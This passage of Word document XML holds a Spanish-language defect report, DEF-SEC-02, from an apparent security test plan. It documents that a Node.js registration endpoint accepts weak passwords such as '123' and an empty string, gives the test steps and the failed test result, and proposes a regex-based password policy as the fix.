      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-05 — Seguridad OWASP A07 (Identificación y Autenticación)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin política de contraseñas — contraseñas débiles aceptadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /auth/register acepta cualquier contraseña sin validar longitud mínima, presencia de mayúsculas ni caracteres especiales. Contraseñas como "123", "", "password" son aceptadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo.
2. MongoDB en memoria activo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST /auth/register con password: "123".
2. POST /auth/register con password: "password".
3. POST /auth/register con password: "".
4. POST /auth/register con password: "12345678".
5. Verificar código HTTP en cada caso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 400 con mensaje de error de política de contraseña en todos los casos débiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 201 en todos los casos. Las 6 contraseñas débiles ("123", "password", "12345678", "", "        ", "abcdefgh") son aceptadas sin restricción.
Test [DEF-SEC-02] FALLA: expected 400, received 201.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: backend/routes/auth.js:45 no tiene ninguna validación de complejidad de contraseña.
Correción: Agregar validación con regex /^(?=.*[A-Z])(?=.*[!@#$%^&amp;*]).{8,}$/ antes de guardar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
